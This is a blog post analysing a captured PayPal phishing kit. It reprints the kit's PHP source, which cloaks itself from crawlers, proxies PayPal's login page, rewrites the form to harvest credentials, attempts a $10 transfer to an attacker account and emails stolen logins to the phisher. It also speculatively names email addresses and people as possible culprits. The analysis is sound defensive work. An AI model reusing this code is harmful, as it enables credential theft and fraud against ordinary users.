Open in app

Sign in

Write

Sign in

Analysis of Captured Phishing Site

Benjamin Drasin
12 min readSep 10, 2014

--

Note: this article discusses details of code designed for the purpose of committing serious crimes. As a result it deliberately omits some details which make the attack significantly more effective and more difficult to detect, and the links to sites containing malicious code have been omitted or obscured. The author will discuss these details and/or share the malicious code only with persons known to him or recognized members of the security community

Executive Summary aka TL/DR

Someone sent me a phishing email, attempting to trick me into thinking a malicious site was Paypal. Because of the careless deployment I was able to obtain the source code to the malicious site and analyze it. The app consists of essentially two attacks:

  1. One using libcurl to mirror Paypal’s website in order to steal Paypal login credentials (— internal documentation refers to this portion of the app as “K3ylock”, a sort of branding effort I think)
  2. The user is then forwarded to a second set of pages to steal credit card information, and this is done using a more conventional phishing application with local web content:
  1. User follows link in phishing
  2. K3yLock portion of phishing app spoofs user request to Paypal using curl
  3. Phishing app emails user credentials to phisher
  4. App forwards user to second part of app, which harvests credit card info
  5. Phishing app emails credit card info to phisher.

The app was not particularly well written and would not fool a careful and sophisticated user, but is very easy to set up and superficially convincing. The app appears to have been written by a different party than the one who deployed it.

For code insights and details, read on…

Another Day, Another Phisher…

Last Week an email arrived in my Inbox, one of the half dozen or so to make it though my spam filters that particular day. Purportedly it was a communication from PayPal informing me that my account was “limited”, and that I ought to log in to restore full functionality:

Original phishing email

There are several suspicious details, including:

  • My name not included
  • European address for Paypal vs North America

A quick look at the message source revealed exactly what I expected: the login link did not link to Paypal but rather to another site, and this was a phishing attempt.

At this point I did what I normally do when I get one of these emails

  1. I logged into Paypal in a separate browser session to confirm that my account was in a normal state
  2. I forwarded the email to the address Paypal provides for security related issues (spoof@paypal.com)

Normally, that would have been that, but in this case, my curiosity got the better of me…

A Closer Look

I took another look at the message source and saw the full link:

Four things stood out to me:

  • The root domain (obscured here) which appeared to be the name of a personal website based on the first-and-last-name of an individual.
  • The URL is plain (unencrypted) http.
  • The long sub-domain name update-your-security-information-for-release-your-limit-account (probably to help obscure the target in the status bar when the user hovers over the link in webmail).
  • The redundant path /webapps/webapps/. This is a mistake that can often happen when setting up a website, where the administrator creates the application root directory and unzips the web application archive into it unaware that the archive itself contains the root directory.

Out of a perverse curiosity, I decided to visit the phishing website. This entails risks as the site was known to be malicious (for all I know there could be a zero-day exploit hosted there). Therefore to minimize my risk I used a private browsing session hosted on a Linux VM which I did not mind if I lost. And indeed, the site looked exactly like Paypal:

The phishing site impersonating Paypal — note the URL (domain obscured)

Note again the plain http link in the address bar. Given the redundant /webapps/webapps link, I was curious about the parent directory, and that’s where I found it:

That’s right — the phisher had made two other amateur mistakes — left directory indexing on, and left the original web archive in the root directory after deploying it! Now this was too much to resist so of course I downloaded the zip file and had a good look.

Application Structure

The phishing application was written in php with a file structure organized by file type (css, js, icon, etc). For reasons not clear to me there is a second web application in the directory “More” which mostly duplicates the structure:

As is normal, the application entry point is the file index.php. A look at the source at once reveals some significant details:

<?phpif(strpos($_SERVER[‘HTTP_USER_AGENT’],’Google’) or strpos($_SERVER[‘HTTP_USER_AGENT’],’Bot’) !== false ) { header(‘HTTP/1.0 404 Not Found’); exit; }
$ip = $_SERVER[‘REMOTE_ADDR’];
$random = rand(0,100000000000);
$dst = md5(“$random”);//+++++++++++++++++// CREATE FOLDER AND COPY FILE \\+++++++++++++++++\\
function recurse_copy($src,$dst) {
error_log(‘SRC: ‘ . $src );
error_log(‘DST: ‘ . $dst);
$dir = opendir($src);
@mkdir($dst);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != ‘.’ ) && ( $file != ‘..’ )) {
if ( is_dir($src . ‘/’ . $file) ) {
recurse_copy($src . ‘/’ . $file,$dst . ‘/’ . $file);
}
else {
copy($src . ‘/’ . $file,$dst . ‘/’ . $file);
}
}
}
closedir($dir);
}$src=”KeyLock”;
recurse_copy( $src, $dst );
header(“location:”.$dst.””);?>

The lack of indentation in this code is reproduced verbatim from the original file. The script returns a 404 to bots or Google’s web crawler, probably to help hide the malicious site. The effect of the rest of the code is to create a sub-directory with a random name and copy the files from “Keylock” to it; after this the app forwards the user to the newly created directory.

This means that every incoming request will result in a copy operation and be serviced by a unique URL. This is why my initial request was redirected to /webapps/webapps/5bd6e1d1760e2f07fd04f01c00e834c. I am not sure of the reason for this; perhaps ensuring a unique URL for each attack might make it harder to detect by some tools? Or perhaps just confusion/lack of skill on the part of the app developer.

Also of interest is the file zzzEmaiL.php:

<?
///
$send = “root.ahmad@outlook.com”; # <<~ Your Email ~|| #
///
?>

NOTE: I have no way of knowing for sure if root.ahmad@outlook.com is the actual email address of the phisher or merely a placeholder which was later overwritten.

As we will see later, this file is included by other php files to collect stolen information. The suggestion seems to be that the script was written by someone other than the person who deployed it, and the writer added this hook to make it easy for a non-technical deployer to add their own address for collecting harvested data.

Digging a little further

The rubber meets the road in the code contained in the KeyLock directory (which, as mentioned earlier, gets copied into a unique URL for each phishing victim). The request here is handled by another php file which starts like this:

$ip = $_SERVER[‘REMOTE_ADDR’];
$details = json_decode(file_get_contents(“http://ipinfo.io/{$ip}/json"));
$negara = $details->country;
$country = strtolower($negara);
$url = “https://www.paypal.com/{$country}";
$agent = $_SERVER[‘HTTP_USER_AGENT’];

Here the phisher is obtaining the publicly available information of the victim based on their IP, and using this to identify a payal site for the country in question. The use of “negara” as a variable name is curious; this is the word for country in Indonesian. Most likely this is the author’s native language (subsequently I found what I believe to be the author’s web site, which appears to confirm this assumption).

Continuing on, the phisher now uses curl to make a request for the paypal home page in the user’s country:

 global $set;
 $curl = curl_init();
 curl_setopt($curl, CURLOPT_URL, $url);
 curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
 curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER[‘HTTP_USER_AGENT’]);
 curl_setopt($curl, CURLOPT_REFERER, $url);
 curl_setopt($curl, CURLOPT_COOKIE,’PP1.txt’);
 curl_setopt($curl, CURLOPT_COOKIEFILE,’PP1.txt’);
 curl_setopt($curl, CURLOPT_COOKIEJAR,’PP1.txt’);
 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
 curl_setopt($curl, CURLOPT_HEADER, 0);
 curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
 if ($Follow !== False) {
 curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
 }
 $result = curl_exec($curl);
 curl_close($curl);

Then, before serving the page to the user some string replacement takes place:

 $get = getStr($_CheckAction, ‘class=”form-inline “>’, ‘novalidate=”novalidate”’);
 $check = str_replace(“https://www.paypal.com/{$lin}/cgi-bin/webscr?cmd=_login-submit", “loging?cmd=_login-done&login_access=47ed28f8a6d3b738a294", $_CheckAction);
 $remo = str_replace($get, ‘<form action=”loging?cmd=_login-done&login_access=47ed28f8a6d3b738a294" method=”post” ‘, $check);

Here the app is finding in the page the form to submit login, removing the form target url on paypal.com, and replacing it with the relative url ‘loging’, with various parameters. This url points to another php file in the phishing app. Thus, although the content in the web page the app is serving was generated by Paypal, when the user enters their username and password it will submit to the phishing app rather than Paypal.

The Phishing Attack — First Glance

It is in the submission of the login form to loging.php that the actual attack takes place. First the script extracts the username and password from the form:

<?php///========================// K3yLock \\========================\\\
$date = gmdate(“r”);
$md5 = md5($date);
$sha1 = sha1($date);
$email = $_POST[‘login_email’];
$password = $_POST[‘login_password’];
///===================// Special For $$ K3yLock \\===================\\\@set_time_limit(0);

I am yet sure what the purpose of the sha1 hash constructed from the current date/time.

Again the attacker forwards the request to Paypal, using the provided password/username to log in and send money:

$url=‘https://www.paypal.com/uk/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40sniper.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows'global $set;
 $curl = curl_init();
 curl_setopt($curl, CURLOPT_URL, $url);
 curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
 curl_setopt($curl, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
 curl_setopt($curl, CURLOPT_REFERER, ‘https://www.paypal.com/uk/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email=sumoniim%40hotmail.com.com&email=gz%40sniper.com&currency=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows');
 curl_setopt($curl, CURLOPT_COOKIE,’PP1.txt’);
 curl_setopt($curl, CURLOPT_COOKIEFILE,’PP1.txt’);
 curl_setopt($curl, CURLOPT_COOKIEJAR,’PP1.txt’);
 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
 curl_setopt($curl, CURLOPT_HEADER, 0);
 curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
 if ($Follow !== False) {
 curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
 } $result = curl_exec($curl);
 curl_close($curl);

The HTTP_REFERER is curious; ostensibly it is from sending a $10 gift from sumoniim@hotmail.com to gz@sniper.com. I suspect the first email address may be an artifact of the script development, copied from a test or sample code, and the second may be the actual account of the author.

The actual login request does indeed attempt to send $10 from the user’s own account (identified by $email) to gz@sniper.com. This may have been the code author’s way of collecting a “cut” of the action when it is used; as we will see the main function of this app will be to send stolen information to another email address (the one added to zzzEmail.php).

As to what the email address tells us, the domain sniper.com is currently vacant and has been since the early 2000's. From what I can tell of its history it was first an ebay auction sniping site, then a free email site. If my guess is correct, then gz@sniper.com is, or was, the author’s own Paypal account.

Continuing on, the application now emails the user’s credentials to the email address in the file zzEmail.php:

///=====// K3yLock \\=====\\\
$ip = $_SERVER[‘REMOTE_ADDR’];
$details = json_decode(file_get_contents(“http://ipinfo.io/{$ip}/json"));
$country = $details->country;
///=====// $$ K3yLock $$ \\=====\\\//+++++++++++++++++++++++++++++// ISI PESAN \\+++++++++++++++++++++++++++++\\
$message = “
++========[ SpamZ ReZulT — K3yLock ]========++ .++====[ PayPal ]====++.
Email : “.$email.”
Password : “.$password.”
 .++======[ End ]======++. .++====[ PC Info ]====++.
IP Info : “.$ip.” | “.$country.” On “.$date.”
Browser : “.$_SERVER[‘HTTP_USER_AGENT’].”
 .++======[ End ]======++.++===[ ^_^ PriVate ScaMPaGe K3yLock ^_^ ]===++
“;
//+++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++\\\include ‘../zzzEmaiL.php’;
$subject = “PayPal (“.$country.”) (“.$ip.”)”;
$headers = “From: PayPal Result<paypal-result@spam1927.com>”;
mail($send,$subject,$message,$headers);

All comments reproduced verbatim from original source file.

Running the Phishing App

To delve further, I set up an environment to run the application. This wasn’t hard; I just installed the necessarily packages to my linux VM (lamp-server, mail, and php5-curl). Then I and unzipped the archive into the web root directory. I replace zzzEmail with a local mail address, and viola! I was running the app locally:

Initial page — note the content exactly duplicates Paypal

I made a few changes to source code to skip the actual submission to Paypal, and entered a fake username/password (blarf and blarfblarf respectively). The result:

Note the different menu style compared to previous screenshot

This is not styled as the current Paypal site; it is serving content from a local php file. The code was at least updated this year as the copyright notice reads 2014 An odd feature of this page is it includes an anti-clickjack script, surely as a result of being copied from Paypal directly at some point in the past.

Next is a the second page of a wizard to collect the credit card info:

Submit it and I get an email like this:

In case you are curious, according to Google Translate, “Korban Cabul” translates to “Molest Victims” or “Victims Obscene” in Malay/Indonesian.

Evaluation

All things considered this was not a very sophisticated app. The most interesting code is the use of curl to exactly duplicate Paypal’s main page prior to login. This makes sense from a resource perspective, because stealing the Paypal login credentials is the primary goal and anything else gained would be just a bonus. The most dangerous thing about this app was just how easy it was to install; just drop it in, change one email address and start sending spam directing people to it!

Countermeasures

Given how easy this type of attack is, what are some of the countermeasures which could prevent or mitigate this?

User Education: As with most phishing attempts, there are many things that would tip off a careful and informed user:

  1. The use of unencrypted http for the site. A determined attacker could obtain a certificate but doing so without revealing their identity would be another hurdle
  2. The domain name in this case was obviously not Paypal. A more resourceful adversary might have used a domain like paypal.some-other-site.com, paypal.com@some-other-site.com, etc.

Take down malicious web sites: The site in question here was offline four days after I received the email, presumably as a result of action from Paypal.

Pursue code author — phishing site operator: Difficult and in this case would probably require international law enforcement activity. Paypal probably couldn't do this alone.

Who are they?

Every indication is that a separate party wrote the code from the one who deployed it. There may have been still another person responsible for generating the spam email directing me to the site. I will refer to these parties as the Author, the Phisher, and the Spammer respectively although it is possible that the Spammer is the same person as the Phisher.

Author

As a result of this investigation I have identified what is likely the author’s website based on similar code, programming idioms, and language. I will not link to it here because it contains code built for the purpose of committing crimes. However just based on what we have seen here we can say some things about this party:

  • Moderately skilled php developer, probably wrote the app alone
  • Possible email/paypal account gz@sniper.com
  • Indonesian speaker, and therefore probably resident in Indonesia

Phisher

  • Not at all experienced with deploying web applications — made several significant mistakes.
  • Likely domain owner/administrator of phishing domain.
  • Possible employee of LowestDomainRates.com (who registered and administered the domain)
  • Possible email addresses:
  • root.ahmad@outlook.com (from zzzEmail in webapps root)
  • cs@tomyachmad.net (from zzzEmail in More root)
  • charles@ldservice.com (from whois information at on the web domain in question)

Spammer

Not much to go on here. The email apparently originated with host ded4851.axc.nl. Todo: Check Whois information, check netcraft for how long ded4851.axc.nl and www.axc.nl have been up, look up Phpmailer to see if there is a web interface running on either domain, etc.

Odds and Ends

  • I obtained the whois information for phishing domain, which indicated that the site was registered to an individual in Florida in 2010. Unless the owner has lost the ability to control the DNS for the root domain, he or she will have been responsible for the creation of the phishing subdomain. I had suspected that the domain had lapsed and been aquired by a malicious entity but I see no evidence that this took place.
  • The application contains what I can only describe as a “branding” effort on the part of the developer, using “Keylock” and “K3ylock” for directory names and the email containing the stolen credentials.
  • A code snippet which is very similar to the script which steals the user’s credentials can be found on the PHP Decode, a site for analyzing malicious or obfuscated php:
    http://www.unphp.net/decode/4d122dc12a6eadfdea6b754c45c75886/
  • Four days after I received the original email, both the phishing site as well as the site at the root domain were no longer online (returned 404 error). I do not know whether or not this was the result of any action I or Paypal took.

--

--

Benjamin Drasin

Written by Benjamin Drasin

27 Followers

Software Professional, current areas of interest include Application Security, Web Services, and Software Architecture

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams